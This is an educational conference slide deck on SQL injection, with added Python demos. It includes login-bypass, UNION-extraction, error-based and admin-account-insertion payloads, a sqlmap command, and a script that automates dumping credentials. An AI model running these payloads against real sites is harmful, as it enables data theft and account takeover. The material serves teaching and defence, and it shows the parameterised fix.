How Did I Steal Your Database
Mostafa Siraj, Application Security Expert
CSCamp2011

DISCLAIMER
Hacking websites is ILLEGAL. This presentation is meant for educational purposes ONLY. Only use this stuff on YOUR website and YOUR account.
Nearly all applications rely on a datastore.

What is a Database
A collection of tables (Users, Orders, Countries, etc.). Each table is a collection of columns and rows.

What is SQL
A query language for interacting with the database. SQL can:
Retrieve data from the database
Insert new records into the database
Delete records from the database
Update records in the database
SQL Queries
To get all data about username elprince:
SELECT Username, Password, First_Name, Last_Name FROM Users WHERE Username='elprince'
Gives a result: the row for elprince (shown on the slide).

FACT
Among Codd's rules for a relational database: metadata must be stored in the database just as regular data is. That is why the structure of the database itself (table and column names) can be read with ordinary SELECT statements, which the attack below relies on.
SQL Injection
A technique where an attacker creates or alters existing SQL commands to:
Expose hidden data (e.g. steal all the records from the tables)
Overwrite data (e.g. the administrator's password)
Execute dangerous system-level commands on the database host

SQL Injection Login Example
SELECT * FROM Users WHERE Username='username' AND Password='password'
If the user enters Elprince, Elprince123 the query will be:
SELECT * FROM Users WHERE Username='Elprince' AND Password='Elprince123'

SQL Injection Example (cont.)
Suppose the user enters ' OR 1=1--, 123. The query will be:
SELECT * FROM Users WHERE Username='' OR 1=1--' AND Password='123'
-- comments out everything after it, so the query that actually runs is:
SELECT * FROM Users WHERE Username='' OR 1=1
This is not enough
You can enhance the injection to log in with the administrator account. The login code takes the first row the query returns; with OR 1=1 every user matches, so sorting on the first column (usually the id) puts the lowest id, typically the administrator, first. Enter ' OR 1=1 ORDER BY 1--, abc and the query will be:
SELECT * FROM Users WHERE Username='' OR 1=1 ORDER BY 1--' AND Password='abc'
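The login bypass on the last three slides, as an added example that is not part of the original slides: a Python script that uses the standard-library sqlite3 module as a stand-in for the application's database (SQLite also treats -- as a line comment, so the payloads work unchanged). The Users table, its rows and both login functions are hypothetical; the vulnerable one concatenates the input exactly as the slide's query does, the safe one binds parameters, which is the fix.

```python
import sqlite3

# Constructed sample accounts (hypothetical; not from the slides). The table is
# deliberately created without a primary key and admin is inserted last, so a
# plain full-table scan yields guest first and only ORDER BY 1 (the id column)
# puts the administrator at the top.
SAMPLE_USERS = [
    (7, "guest", "guest"),
    (2, "elprince", "Elprince123"),
    (1, "admin", "s3cret-admin"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The slides' query, built by string concatenation: the input becomes SQL.
    Like a naive login handler it returns the first matching (id, Username)
    row, or None when nothing matched."""
    sql = (f"SELECT id, Username FROM Users WHERE Username='{username}' "
           f"AND Password='{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Same query with bound parameters. The values travel separately from the
    SQL text, so a quote in the input can never close the string literal."""
    sql = "SELECT id, Username FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "elprince", "Elprince123"))        # (2, 'elprince')
    print(login_vulnerable(db, "' OR 1=1--", "123"))              # whichever row comes first
    print(login_vulnerable(db, "' OR 1=1 ORDER BY 1--", "abc"))   # (1, 'admin')
    print(login_safe(db, "' OR 1=1 ORDER BY 1--", "abc"))         # None
```

The parameterised version rejects the payload because the whole string `' OR 1=1 ORDER BY 1--` is compared against the Username column as data; nothing the user types can change the shape of the statement.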
Finding SQL Injection Bugs
Submit a single quotation mark and observe the result.
Submit two single quotation marks and observe the result (a quoted string that the first probe broke should be accepted again).
For multi-step processes, complete all the steps before observing the results.
For search fields, try using the wildcard character %.
For numeric data, if the original value was 2 try submitting 1+1 or 3-1: if the response is the same as for 2, the arithmetic was evaluated by the database.
If successful, try SQL-specific functions, e.g. 67-ASCII('A') [ASCII('A') = 65, so this is still 2].
If single quotes are filtered, try 51-ASCII(1) [note ASCII(1) = 49: the number is converted to the string '1' before ASCII() is applied].
Identify the database engine
The error messages will tell us the DB engine.
We can guess the DB from the OS or web server (e.g. LAMP: Linux + Apache + MySQL + PHP).
Use engine-specific characters or commands. String concatenation differs between engines, so inject each form and see which one is accepted:
'||'FOO   Oracle
'+'FOO    Microsoft SQL Server
' 'FOO    MySQL [note the space between the two quotes]

Identify user privileges
' and 1 in (SELECT user)--
'; IF user='admin' WAITFOR DELAY '0:0:10'--
(user returns the current database user name; the second probe is blind, a ten-second delay in the response is the only signal, and WAITFOR DELAY is SQL Server syntax.)
Injection in Search Fields
Entering normal input: search results come back.
Trying a single quote: I receive an error. The error states that it's MySQL.
Suppose I still don't know the DB engine. Is it SQL Server? Note: string concatenation in SQL Server is +. I get an error, so it's not SQL Server.
Is it Oracle? Note: string concatenation in Oracle is ||. Different error, still not Oracle.
Is it MySQL? Note: string concatenation in MySQL is a blank space between the two strings. It works: it's MySQL.
The query in the backend is something like this:
SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR …. LIKE ….   <- a possible location for my input

The Strategy
1. Get the number of items after the SELECT statement (how many columns are there?)
   SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
2. Identify the location of the STRINGS in the SELECT statement (which of those columns are strings?)
   SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
3. Get the structure of the database
   SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
4. Get the data from the database
   SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
1. Get the number of items after the SELECT statement
Try a number: error.
Try another number: a result comes back, but why are there fewer results?
Try another number: error, so it's not 8.
Let's try 7: result. So the SELECT statement has 7 columns.
2. Identify the location of the STRINGS in the SELECT statement
1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result: no error, which confirms the 7 columns (# is the MySQL end-of-line comment; NULL is accepted in a column of any type).
Get the strings and their locations:
1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result: the markers that appear in the page show which columns accept strings and where each one is rendered.
3. Get the structure of the database
1234') UNION SELECT NULL,NULL,NULL,table_name,NULL,NULL,NULL FROM information_schema.tables#
Result: the table names are listed in the fourth column of the search results.
Next queries
1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='users'#
1234') UNION SELECT NULL,NULL,NULL,username,password,NULL,NULL FROM users WHERE id<100#
……. Continue till you get all the tables.
(Match the case of the table name exactly: on Linux, MySQL table names are case-sensitive, so 'USERS' and 'users' are different lookups.)
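The four-step strategy automated end to end, as an added example that is not from the slides or the demo application: Python with an in-memory sqlite3 database standing in for MySQL, so the line comment is -- instead of #, and sqlite_master / pragma_table_info() stand in for information_schema.tables / information_schema.columns. The search endpoint, its products and users tables and every row are constructed for the example; the search term lands inside quotes and parentheses as on the slides, and the page renders only two of the four selected columns, which is exactly what step 2 has to discover before steps 3 and 4 can place data where it will be shown.

```python
import re
import sqlite3

# Constructed sample schema and rows (hypothetical; not from the slides).
SCHEMA = """
CREATE TABLE products (id INTEGER, name TEXT, category TEXT, price REAL);
INSERT INTO products VALUES (1, 'Laptop', 'hardware', 999.0);
INSERT INTO products VALUES (2, 'Mouse', 'hardware', 19.5);
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'Adm1n!');
INSERT INTO users VALUES (2, 'elprince', 'Elprince123');
"""


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_page(conn: sqlite3.Connection, q: str) -> str:
    """Vulnerable search endpoint. The term lands inside quotes and parentheses,
    so the injection closes both, as the slides' 1234') payloads do. Only name
    and category are rendered: columns 1 and 4 of the SELECT never reach the
    page, which is why the attacker must find the reflected positions."""
    sql = (f"SELECT id, name, category, price FROM products "
           f"WHERE (name LIKE '%{q}%' OR category LIKE '%{q}%')")
    rows = conn.execute(sql).fetchall()
    return "".join(f"<tr><td>{r[1]}</td><td>{r[2]}</td></tr>" for r in rows)


def count_columns(page, max_cols: int = 20) -> int:
    """Step 1: ORDER BY n is accepted while n <= number of selected columns
    and raises an error as soon as it is one too many."""
    for n in range(1, max_cols + 1):
        try:
            page(f"zzz') ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("could not determine the column count")


def reflected_positions(page, ncols: int) -> list:
    """Step 2: UNION a row of distinct string markers and see which of them
    show up in the response; those positions can carry extracted data."""
    markers = [f"MK{i}X" for i in range(1, ncols + 1)]
    body = page("zzz') UNION SELECT " + ",".join(f"'{m}'" for m in markers) + "--")
    return [i + 1 for i, m in enumerate(markers) if m in body]


def union_extract(page, ncols: int, pos: int, expr: str, from_clause: str) -> list:
    """Steps 3 and 4: put `expr` in reflected column `pos`, NULL everywhere
    else, and collect the cells that came back. NULL renders as 'None', so
    every other cell is data returned by our injected SELECT."""
    cols = ["NULL"] * ncols
    cols[pos - 1] = expr
    body = page(f"zzz') UNION SELECT {','.join(cols)} FROM {from_clause}--")
    return sorted(c for c in re.findall(r"<td>(.*?)</td>", body) if c != "None")


def steal_database(page) -> dict:
    """Run the slides' four steps end to end against a page() callable."""
    ncols = count_columns(page)
    reflected = reflected_positions(page, ncols)
    pos = reflected[0]
    tables = union_extract(page, ncols, pos, "name",
                           "sqlite_master WHERE type='table'")
    schema = {t: union_extract(page, ncols, pos, "name", f"pragma_table_info('{t}')")
              for t in tables}
    creds = union_extract(page, ncols, pos, "username || ':' || password", "users")
    return {"columns": ncols, "reflected": reflected,
            "tables": tables, "schema": schema, "users": creds}


if __name__ == "__main__":
    db = make_db()
    print(steal_database(lambda q: search_page(db, q)))
```

Against a real target the page() callable would be an HTTP request and the response body; everything else stays the same, which is why this procedure is so easy to automate.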
Injection with error messages
Gives me an error.
Getting the database version:
' and 1 in (SELECT @@version)--
Gives me this error: the database tries to compare the version string with the number 1, and the conversion error it raises quotes the string it could not convert.
Getting column names
I get an error that names the first column.
Getting the next column name:
' group by login.firstname having 1=1--
I get this error.
Again:
' group by login.firstname, login.surname having 1=1--
The error reveals a new column name.
Again:
' group by login.firstname, login.surname, login.username having 1=1--
New column name.
Continue… Each error complains that the next column is not contained in the GROUP BY clause, which is how its name leaks; add it to the list and repeat.
After getting all of the columns I found a field called IsAdmin - that's my goal. Putting the following query creates an admin account on the application:
'; INSERT INTO Login(username,pwd,IsAdmin,……) VALUES('Administrator','******',TRUE,…..)--
(If IsAdmin is a bit column, use 1 rather than TRUE; T-SQL has no boolean literal.)
Not all injections generate errors (blind injection): the only signals are differences in the page content or in the response time, as with the WAITFOR DELAY probe earlier.

DEMO: SQLMap
You Were a GREAT Audience
Thank You
@mostafasiraj, Mostafa Siraj

How Did I Steal Your Database (CSCamp2011)


Editor's Notes

#71 (sqlmap demo): -u "http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&account_no=5204320422040001" --cookie "ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false" -p account_no